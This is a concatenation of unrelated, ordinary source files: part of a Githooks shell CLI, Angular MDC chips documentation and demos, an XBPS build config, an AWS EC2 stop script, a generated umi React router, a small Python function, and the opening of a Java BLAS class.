config_delete_detected_lfs_hooks() {
if [ "$1" = "yes" ]; then
git config --global githooks.deleteDetectedLFSHooks "a"
config_delete_detected_lfs_hooks "print"
elif [ "$1" = "no" ]; then
git config --global githooks.deleteDetectedLFSHooks "n"
config_delete_detected_lfs_hooks "print"
elif [ "$1" = "reset" ]; then
git config --global --unset githooks.deleteDetectedLFSHooks
config_delete_detected_lfs_hooks "print"
elif [ "$1" = "print" ]; then
VALUE=$(git config --global githooks.deleteDetectedLFSHooks)
if [ "$VALUE" = "Y" ]; then
echo "Detected LFS hooks are by default deleted"
else
echo "Detected LFS hooks are by default disabled and backed up"
fi
else
echo "! Invalid operation: \`$1\` (use \`yes\`, \`no\` or \`reset\`)" >&2
exit 1
fi
}
#####################################################
# Manages the app script folders.
#
# Returns:
# 1 on failure, 0 otherwise
#####################################################
manage_tools() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks tools register <toolName> <scriptFolder>
Install the script folder \`<scriptFolder>\` in
the installation directory under \`tools/<toolName>\`.
Currently the following tools are supported:
>> Dialog Tool (<toolName> = \"dialog\")
The interface of the dialog tool is as follows.
# if \`run\` is executable
\$ run <title> <text> <options> <long-options>
# otherwise, assuming \`run\` is a shell script
\$ sh run <title> <text> <options> <long-options>
The arguments of the dialog tool are:
- \`<title>\` the title for the GUI dialog
- \`<text>\` the text for the GUI dialog
- \`<short-options>\` the button return values, slash-delimited,
e.g. \`Y/n/d\`.
The default button is the first capital character found.
- \`<long-options>\` the button texts in the GUI,
e.g. \`Yes/no/disable\`
The script needs to return one of the short-options on \`stdout\`.
Non-zero exit code triggers the fallback of reading from \`stdin\`.
git hooks tools unregister <toolName>
Uninstall the script folder in the installation
directory under \`tools/<toolName>\`.
"
return
fi
TOOLS_OPERATION="$1"
shift
case "$TOOLS_OPERATION" in
"register")
tools_register "$@"
;;
"unregister")
tools_unregister "$@"
;;
*)
manage_tools "help"
echo "! Invalid tools option: \`$TOOLS_OPERATION\`" >&2
exit 1
;;
esac
}
#####################################################
# Installs a script folder of a tool.
#
# Returns:
# 1 on failure, 0 otherwise
#####################################################
tools_register() {
if [ "$1" = "dialog" ]; then
SCRIPT_FOLDER="$2"
if [ -d "$SCRIPT_FOLDER" ]; then
SCRIPT_FOLDER=$(cd "$SCRIPT_FOLDER" && pwd)
if [ ! -f "$SCRIPT_FOLDER/run" ]; then
echo "! File \`run\` does not exist in \`$SCRIPT_FOLDER\`" >&2
exit 1
fi
if ! tools_unregister "$1" --quiet; then
echo "! Unregister failed!" >&2
exit 1
fi
TARGET_FOLDER="$INSTALL_DIR/tools/$1"
mkdir -p "$TARGET_FOLDER" >/dev/null 2>&1 # Install new
if ! cp -r "$SCRIPT_FOLDER"/* "$TARGET_FOLDER"/; then
echo "! Registration failed" >&2
exit 1
fi
echo "Registered \`$SCRIPT_FOLDER\` as \`$1\` tool"
else
echo "! The \`$SCRIPT_FOLDER\` directory does not exist!" >&2
exit 1
fi
else
echo "! Invalid operation: \`$1\` (use \`dialog\`)" >&2
exit 1
fi
}
#####################################################
# Uninstalls a script folder of a tool.
#
# Returns:
# 1 on failure, 0 otherwise
#####################################################
tools_unregister() {
[ "$2" = "--quiet" ] && QUIET="Y"
if [ "$1" = "dialog" ]; then
if [ -d "$INSTALL_DIR/tools/$1" ]; then
rm -r "$INSTALL_DIR/tools/$1"
[ -n "$QUIET" ] || echo "Uninstalled the \`$1\` tool"
else
[ -n "$QUIET" ] || echo "! The \`$1\` tool is not installed" >&2
fi
else
[ -n "$QUIET" ] || echo "! Invalid tool: \`$1\` (use \`dialog\`)" >&2
exit 1
fi
}
#####################################################
# Prints the version number of this script,
# that would match the latest installed version
# of Githooks in most cases.
#####################################################
print_current_version_number() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks version
Prints the version number of the \`git hooks\` helper and exits.
"
return
fi
CURRENT_VERSION=$(execute_git "$GITHOOKS_CLONE_DIR" rev-parse --short=6 HEAD)
CURRENT_COMMIT_DATE=$(execute_git "$GITHOOKS_CLONE_DIR" log -1 "--date=format:%y%m.%d%H%M" --format="%cd" HEAD)
CURRENT_COMMIT_LOG=$(execute_git "$GITHOOKS_CLONE_DIR" log --pretty="format:%h (%s, %ad)" --date=short -1)
print_help_header
echo
echo "Version: $CURRENT_COMMIT_DATE-$CURRENT_VERSION"
echo "Commit: $CURRENT_COMMIT_LOG"
echo
}
#####################################################
# Dispatches the command to the
# appropriate helper function to process it.
#
# Returns:
# 1 if an unknown command was given,
# the exit code of the command otherwise
#####################################################
choose_command() {
CMD="$1"
[ -n "$CMD" ] && shift
case "$CMD" in
"disable")
disable_hook "$@"
;;
"enable")
enable_hook "$@"
;;
"accept")
accept_changes "$@"
;;
"trust")
manage_trusted_repo "$@"
;;
"list")
list_hooks "$@"
;;
"shared")
manage_shared_hook_repos "$@"
;;
"pull")
update_shared_hook_repos "$@"
;;
"install")
run_ondemand_installation "$@"
;;
"uninstall")
run_ondemand_uninstallation "$@"
;;
"update")
run_update_check "$@"
;;
"readme")
manage_readme_file "$@"
;;
"ignore")
manage_ignore_files "$@"
;;
"config")
manage_configuration "$@"
;;
"tools")
manage_tools "$@"
;;
"version")
print_current_version_number "$@"
;;
"help")
print_help
;;
*)
print_help
[ -n "$CMD" ] && echo "! Unknown command: $CMD" >&2
exit 1
;;
esac
}
set_main_variables
# Choose and execute the command
choose_command "$@"
|
import {Component, OnInit, ViewChild} from '@angular/core';
import {FormGroup, FormControl} from '@angular/forms';
import {ComponentViewer, ComponentApi} from '../../shared/component-viewer';
import {MdcChipSetChange, MdcChipSelectionEvent, MdcChipRemovalEvent, MdcChipInteractionEvent} from '@angular-mdc/web/chips';
@Component({template: '<component-api></component-api>'})
export class Api implements OnInit {
@ViewChild(ComponentApi, {static: true}) _componentApi: ComponentApi;
ngOnInit() {
this._componentApi.docApi = {
sections: [
{
header: 'MdcChipSet',
selectors: [
'mdc-chip-set',
],
exportedAs: 'mdcChipSet',
categories: [
{
name: 'Properties',
items: [
{name: 'choice: boolean', summary: 'Indicates that the chips in the set are choice chips, which allow a single selection from a set of options.'},
{name: 'filter: boolean', summary: 'Indicates that the chips in the set are filter chips, which allow multiple selection from a set of options.'},
{name: 'input: boolean', summary: 'Indicates that the chips in the set are input chips, which enable user input by converting text into chips.'},
{name: 'touch: boolean', summary: 'Set the component touch target to 48 x 48 px.'},
]
},
{
name: 'Methods',
items: [
{name: 'getSelectedChipIds(): string[]', summary: 'Returns an array of the IDs of all selected chips.'},
{name: 'select(chipId: string): void', summary: 'Selects the chip with the given id. Deselects all other chips if the chip set is of the choice variant.'},
]
},
{
name: 'Events',
items: [
{name: 'interaction: MdcChipInteractionEvent', summary: 'Indicates when a chip is interacted with (via click/tap or Enter key)'},
{name: 'change: MdcChipSetChange', summary: 'Emitted when a chip is interacted with.'},
]
},
]
},
{
header: 'MdcChip',
selectors: [
'mdc-chip',
],
exportedAs: 'mdcChip',
categories: [
{
name: 'Properties',
items: [
{name: 'choice: boolean', summary: 'Indicates that the chips in the set are choice chips, which allow a single selection from a set of options.'},
{name: 'filter: boolean', summary: 'Indicates that the chips in the set are filter chips, which allow multiple selection from a set of options.'},
{name: 'input: boolean', summary: 'Indicates that the chips in the set are input chips, which enable user input by converting text into chips.'},
{name: 'touch: boolean', summary: 'Set the component touch target to 48 x 48 px.'},
{name: 'label: string', summary: 'Sets the text content of the chip.'},
{name: 'value: string | string[]', summary: 'The value of the chip. Defaults to the content inside mdc-chip.'},
{name: 'removable: boolean', summary: 'Sets whether a trailing icon click should trigger exit/removal of the chip. (Default is true)'},
{name: 'disableRipple: boolean', summary: 'Whether ripples are disabled.'},
]
},
{
name: 'Methods',
items: [
{name: 'focus()', summary: 'Set focus to the chip.'},
]
},
{
name: 'Events',
items: [
{name: 'interactionEvent: MdcChipInteractionEvent', summary: 'Indicates the chip was interacted with (via click/tap or Enter key)'},
{name: 'selectionChange: MdcChipSelectionEvent', summary: `Indicates the chip's selection state has changed (for choice/filter chips)`},
{name: `removalEvent: MdcChipRemovalEvent`, summary: `Indicates the chip removal event from a chip set`},
{name: `navigationEvent: MdcChipNavigationEvent`, summary: `Indicates a navigation event has occurred on a chip`},
{name: `trailingIconInteraction: MdcChipInteractionEvent`, summary: `Indicates the chip's trailing icon was interacted with (via click/tap or Enter key)`},
]
},
]
},
{
header: 'MdcChipText',
summary: 'Optional. Indicates the text content of the chip.',
selectors: ['mdc-chip-text'],
exportedAs: 'mdcChipText',
},
{
header: 'MdcChipIcon',
summary: 'Optional. Indicates an icon in the chip.',
selectors: ['mdc-chip-icon'],
exportedAs: 'mdcChipIcon',
categories: [
{
name: 'Properties',
items: [
{name: 'leading: boolean', summary: 'Indicates a leading icon in the chip'},
{name: 'leading: boolean', summary: 'Indicates a trailing icon in the chip'},
]
}
]
},
]
};
}
}
@Component({template: '<component-viewer></component-viewer>'})
export class Chips implements OnInit {
@ViewChild(ComponentViewer, {static: true}) _componentViewer: ComponentViewer;
ngOnInit(): void {
this._componentViewer.template = {
title: 'Chips',
description: `Chips are compact elements that allow users to enter information, select a choice, filter content, or trigger an action.`,
references: [{
name: 'Material Design guidelines: Chips',
url: 'https://material.io/guidelines/components/chips.html'
}, {
name: 'Material Components Web',
url: 'https://github.com/material-components/material-components-web/blob/master/packages/mdc-chips/README.md'
}],
mdcUrls: [
{name: 'Sass Mixins', url: 'https://github.com/material-components/material-components-web/blob/master/packages/mdc-chips/README.md#sass-mixins'},
],
code: `import {MdcChipsModule} from '@angular-mdc/web/chips';`,
sass: `@use '@material/chips/mdc-chips';
@use '@material/chips';`
};
}
}
export interface ChipFood {
value: string;
viewValue: string;
}
@Component({templateUrl: './examples.html'})
export class Examples {
demoChipValue = 'pizza-1';
ngModelValue = 'tacos-2';
chipForm = new FormGroup({
chipFood: new FormControl('steak-0')
});
foods: ChipFood[] = [
{value: 'steak-0', viewValue: 'Steak'},
{value: 'pizza-1', viewValue: 'Pizza'},
{value: 'tacos-2', viewValue: 'Tacos'},
];
onChipSetChange(evt: MdcChipSetChange): void {
console.log(evt);
}
onChipInteraction(evt: MdcChipInteractionEvent): void {
console.log(`MdcChipInteractionEvent: ${evt.chipId} : ${evt.value}`);
}
onChipSelection(evt: MdcChipSelectionEvent): void {
console.log(`MdcChipSelectionEvent: ${evt.chipId} : ${evt.selected}`);
}
onChipRemoved(evt: MdcChipRemovalEvent): void {
console.log(`MdcChipRemovalEvent: ${evt.chipId}`);
}
//
// Examples
//
reuseFoods = `foods: ChipFood[] = [
{value: 'steak-0', viewValue: 'Steak'},
{value: 'pizza-1', viewValue: 'Pizza'},
{value: 'tacos-2', viewValue: 'Tacos'},
];`;
exampleSimple = {
html: `<mdc-chip-set>
<mdc-chip>
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-text><NAME></mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`
};
exampleInput = {
html: `<mdc-chip-set input>
<mdc-chip label="Alice" (removalEvent)="onChipRemoved($event)">
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-icon trailing>cancel</mdc-chip-icon>
</mdc-chip>
<mdc-chip label="Bob" (removalEvent)="onChipRemoved($event)">
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-icon trailing>cancel</mdc-chip-icon>
</mdc-chip>
<mdc-chip label='Charlie' (removalEvent)="onChipRemoved($event)">
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-icon trailing>cancel</mdc-chip-icon>
</mdc-chip>
<mdc-chip label='David' (removalEvent)="onChipRemoved($event)">
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-icon trailing>cancel</mdc-chip-icon>
</mdc-chip>
</mdc-chip-set>`
};
exampleChoice = {
html: `<mdc-chip-set choice>
<mdc-chip>
<mdc-chip-text>Get Directions</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-text>Get Weather</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-text>Add to Calendar</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`
};
exampleFilter = {
html: `<mdc-chip-set filter>
<mdc-chip>
<mdc-chip-text>Tops</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-text>Bottoms</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-text>Shoes</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-text>Accessories</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`
};
exampleFilterWithIcon = {
html: `<mdc-chip-set filter>
<mdc-chip>
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-text>Alice</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-text>Bob</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-text>Charlie</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-text>David</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`
};
exampleAction = {
html: `<mdc-chip-set>
<mdc-chip>
<mdc-chip-icon leading>wb_sunny</mdc-chip-icon>
<mdc-chip-text>Turn on lights</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>bookmark</mdc-chip-icon>
<mdc-chip-text>Bookmark</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>alarm</mdc-chip-icon>
<mdc-chip-text>Set alarm</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>directions</mdc-chip-icon>
<mdc-chip-text>Get Directions</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`
};
exampleShape = {
html: `<mdc-chip-set>
<mdc-chip class="custom-chip--shape-radius">
<mdc-chip-text>Turn on lights</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--shape-radius">
<mdc-chip-text>Bookmark</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--shape-radius">
<mdc-chip-text>Set alarm</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--shape-radius">
<mdc-chip-text>Get Directions</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`,
sass: `https://raw.githubusercontent.com/trimox/angular-mdc-web/master/demos/src/styles/_chips.scss`
};
exampleTheme = {
html: `<mdc-chip-set>
<mdc-chip class="custom-chip-secondary">
<mdc-chip-text>Turn on lights</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip-secondary">
<mdc-chip-text>Bookmark</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip-secondary">
<mdc-chip-text>Set alarm</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip-secondary">
<mdc-chip-text>Get Directions</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`,
sass: `https://raw.githubusercontent.com/trimox/angular-mdc-web/master/demos/src/styles/_chips.scss`
};
exampleCustom = {
html: `<mdc-chip-set>
<mdc-chip class="custom-chip--height">
<mdc-chip-text>Height</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--horizontal-padding">
<mdc-chip-text>Horizontal Padding</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--leading-icon-color">
<mdc-chip-icon leading>wb_sunny</mdc-chip-icon>
<mdc-chip-text>Leading Icon Color</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--trailing-icon-color">
<mdc-chip-text>Trailing Icon Color</mdc-chip-text>
<mdc-chip-icon trailing>wb_sunny</mdc-chip-icon>
</mdc-chip>
<mdc-chip class="custom-chip--leading-icon-size">
<mdc-chip-icon leading>wb_sunny</mdc-chip-icon>
<mdc-chip-text>Leading Icon Size</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--trailing-icon-size">
<mdc-chip-text>Trailing Icon Size</mdc-chip-text>
<mdc-chip-icon trailing>wb_sunny</mdc-chip-icon>
</mdc-chip>
<mdc-chip class="custom-chip--leading-icon-margin">
<mdc-chip-icon leading>wb_sunny</mdc-chip-icon>
<mdc-chip-text>Leading Icon Margin</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--trailing-icon-margin">
<mdc-chip-text>Trailing Icon Margin</mdc-chip-text>
<mdc-chip-icon trailing>wb_sunny</mdc-chip-icon>
</mdc-chip>
</mdc-chip-set>`,
sass: `https://raw.githubusercontent.com/trimox/angular-mdc-web/master/demos/src/styles/_chips.scss`
};
exampleValue = {
html: `<mdc-chip-set choice #chipSetValue (change)="onChipSetChange($event)" [value]="demoChipValue">
<mdc-chip *ngFor="let food of foods" [value]="food.value"
(interaction)="onChipInteraction($event)"
(selectionChange)="onChipInteraction($event)">
{{food.viewValue}}
</mdc-chip>
</mdc-chip-set>`,
ts: `${this.reuseFoods}
demoChipValue = 'pizza-1';
onChipSetChange(evt: MdcChipSetChange): void {
// do something
}
onChipInteraction(evt: MdcChipInteractionEvent): void {
// do something
}
onChipSelection(evt: MdcChipSelectionEvent): void {
// do something
}`
};
exampleNgModel = {
html: `<mdc-chip-set choice [(ngModel)]="ngModelValue">
<mdc-chip *ngFor="let food of foods" [value]="food.value">
{{food.viewValue}}
</mdc-chip>
</mdc-chip-set>`,
ts: `ngModelValue = 'tacos-2';
${this.reuseFoods}`
};
exampleReactiveForm = {
html: `<form [formGroup]="chipForm" novalidate>
<mdc-chip-set choice formControlName="chipFood">
<mdc-chip *ngFor="let food of foods" [value]="food.value">
{{food.viewValue}}
</mdc-chip>
</mdc-chip-set>
</form>`,
ts: `${this.reuseFoods}
chipForm = new FormGroup({
chipFood: new FormControl('steak-0')
});`
};
exampleAccessibility = {
html: `<div class="mdc-touch-target-wrapper">
<mdc-chip touch label="My Accessibility Chip"></mdc-chip>
</div>`
};
}
|
XBPS_TARGET_CFLAGS="-march=armv8-a"
XBPS_TARGET_CXXFLAGS="$XBPS_TARGET_CFLAGS"
XBPS_TARGET_FFLAGS=""
XBPS_TRIPLET="aarch64-unknown-linux-musl"
|
#! /bin/bash
read -p "Enter instance name: " INAME
if [ -z "$INAME" ]; then
printf '%s\n' "An instance name is needed"
exit 1
fi
IID=`aws ec2 describe-instances --filters 'Name=tag:Name,Values='"$INAME"'' \
--output text --query 'Reservations[*].Instances[*].InstanceId'`
echo Stopping instance named $INAME with id $IID
aws ec2 stop-instances --instance-ids $IID
|
<filename>src/pages/.umi/router.js
import React from 'react';
import { Router as DefaultRouter, Route, Switch } from 'react-router-dom';
import dynamic from 'umi/dynamic';
import renderRoutes from 'umi/lib/renderRoutes';
import history from '@tmp/history';
import RendererWrapper0 from '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/.umi/LocaleWrapper.jsx';
import _dvaDynamic from 'dva/dynamic';
const Router = require('dva/router').routerRedux.ConnectedRouter;
const routes = [
{
path: '/user',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "layouts__UserLayout" */ '../../layouts/UserLayout'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../../layouts/UserLayout').default,
routes: [
{
path: '/user',
redirect: '/user/login',
exact: true,
},
{
path: '/user/login',
name: 'login',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__User__models__register.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/User/models/register.js').then(
m => {
return { namespace: 'register', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__User__Login" */ '../User/Login'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../User/Login').default,
exact: true,
},
{
path: '/user/register',
name: 'register',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__User__models__register.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/User/models/register.js').then(
m => {
return { namespace: 'register', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__User__Register" */ '../User/Register'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../User/Register').default,
exact: true,
},
{
path: '/user/register-result',
name: 'register.result',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__User__models__register.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/User/models/register.js').then(
m => {
return { namespace: 'register', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__User__RegisterResult" */ '../User/RegisterResult'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../User/RegisterResult').default,
exact: true,
},
{
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__404" */ '../404'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../404').default,
exact: true,
},
{
component: () =>
React.createElement(
require('/Users/mac/Desktop/WebUI/briup/day05/ej/node_modules/umi-build-dev/lib/plugins/404/NotFound.js')
.default,
{ pagesPath: 'src/pages', hasRoutesInConfig: true },
),
},
],
},
{
path: '/',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "layouts__BasicLayout" */ '../../layouts/BasicLayout'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../../layouts/BasicLayout').default,
Routes: [require('../Authorized').default],
routes: [
{
path: '/',
redirect: '/dashboard/analysis',
authority: ['admin', 'user'],
exact: true,
},
{
path: '/dashboard',
name: 'dashboard',
icon: 'dashboard',
routes: [
{
path: '/dashboard/analysis',
name: 'analysis',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__Dashboard__models__activities.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/activities.js').then(
m => {
return { namespace: 'activities', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__chart.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/chart.js').then(
m => {
return { namespace: 'chart', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__monitor.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/monitor.js').then(
m => {
return { namespace: 'monitor', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__Dashboard__Analysis" */ '../Dashboard/Analysis'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Dashboard/Analysis').default,
exact: true,
},
{
path: '/dashboard/monitor',
name: 'monitor',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__Dashboard__models__activities.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/activities.js').then(
m => {
return { namespace: 'activities', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__chart.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/chart.js').then(
m => {
return { namespace: 'chart', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__monitor.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/monitor.js').then(
m => {
return { namespace: 'monitor', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__Dashboard__Monitor" */ '../Dashboard/Monitor'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Dashboard/Monitor').default,
exact: true,
},
{
path: '/dashboard/workplace',
name: 'workplace',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__Dashboard__models__activities.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/activities.js').then(
m => {
return { namespace: 'activities', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__chart.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/chart.js').then(
m => {
return { namespace: 'chart', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__monitor.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/monitor.js').then(
m => {
return { namespace: 'monitor', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__Dashboard__Workplace" */ '../Dashboard/Workplace'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Dashboard/Workplace').default,
exact: true,
},
{
component: () =>
React.createElement(
require('/Users/mac/Desktop/WebUI/briup/day05/ej/node_modules/umi-build-dev/lib/plugins/404/NotFound.js')
.default,
{ pagesPath: 'src/pages', hasRoutesInConfig: true },
),
},
],
},
{
path: '/customer',
icon: 'user',
name: 'customer',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Customer__Customer" */ '../Customer/Customer'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Customer/Customer').default,
exact: true,
},
{
path: '/customerDetails',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Customer__CustomerDetails" */ '../Customer/CustomerDetails'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Customer/CustomerDetails').default,
exact: true,
},
{
path: '/category',
icon: 'ordered-list',
name: 'category',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Category__Category" */ '../Category/Category'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Category/Category').default,
exact: true,
},
{
path: '/product',
icon: 'shopping',
name: 'product',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Product__Product" */ '../Product/Product'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Product/Product').default,
exact: true,
},
{
path: '/order',
icon: 'snippets',
name: 'order',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Order__Order" */ '../Order/Order'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Order/Order').default,
exact: true,
},
{
path: '/comment',
icon: 'smile',
name: 'comment',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__Comment__Comment" */ '../Comment/Comment'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Comment/Comment').default,
exact: true,
},
{
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__404" */ '../404'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../404').default,
exact: true,
},
{
component: () =>
React.createElement(
require('/Users/mac/Desktop/WebUI/briup/day05/ej/node_modules/umi-build-dev/lib/plugins/404/NotFound.js')
.default,
{ pagesPath: 'src/pages', hasRoutesInConfig: true },
),
},
],
},
{
component: () =>
React.createElement(
require('/Users/mac/Desktop/WebUI/briup/day05/ej/node_modules/umi-build-dev/lib/plugins/404/NotFound.js')
.default,
{ pagesPath: 'src/pages', hasRoutesInConfig: true },
),
},
];
window.g_routes = routes;
const plugins = require('umi/_runtimePlugin');
plugins.applyForEach('patchRoutes', { initialValue: routes });
export { routes };
export default class RouterWrapper extends React.Component {
unListen = () => {};
constructor(props) {
super(props);
// route change handler
function routeChangeHandler(location, action) {
plugins.applyForEach('onRouteChange', {
initialValue: {
routes,
location,
action,
},
});
}
this.unListen = history.listen(routeChangeHandler);
routeChangeHandler(history.location);
}
componentWillUnmount() {
this.unListen();
}
render() {
const props = this.props || {};
return (
<RendererWrapper0>
<Router history={history}>{renderRoutes(routes, props)}</Router>
</RendererWrapper0>
);
}
}
|
def HOURGLASS(x, shorten_factors):
# Sort the shorten_factors list in descending order
shorten_factors.sort(reverse=True)
# Apply the shorten_factors to the input value x
for factor in shorten_factors:
if x % factor == 0:
x = x // factor
return x
# Example usage
x = 24
shorten_factors = [2, 3]
result = HOURGLASS(x, shorten_factors)
print(result) # Output: 4 |
<reponame>weltam/idylfin
/**
* Copyright (C) 2011 - present by OpenGamma Inc. and the OpenGamma group of companies
*
* Please see distribution for license.
*/
package com.opengamma.maths.lowlevelapi.linearalgebra.blas.blas2kernelimplementations;
import java.util.Arrays;
import com.opengamma.maths.lowlevelapi.datatypes.primitive.DenseSymmetricMatrix;
import com.opengamma.maths.lowlevelapi.linearalgebra.blas.BLAS1;
import com.opengamma.maths.lowlevelapi.linearalgebra.blas.blas2kernelabstractions.BLAS2DGEMVKernelAbstraction;
/**
* Does DGEMV like operations on the {@link DenseSymmetricMatrix} type
*/
public final class DGEMVForDenseSymmetricMatrix extends BLAS2DGEMVKernelAbstraction<DenseSymmetricMatrix> {
private static DGEMVForDenseSymmetricMatrix s_instance = new DGEMVForDenseSymmetricMatrix();
public static DGEMVForDenseSymmetricMatrix getInstance() {
return s_instance;
}
private DGEMVForDenseSymmetricMatrix() {
}
@Override
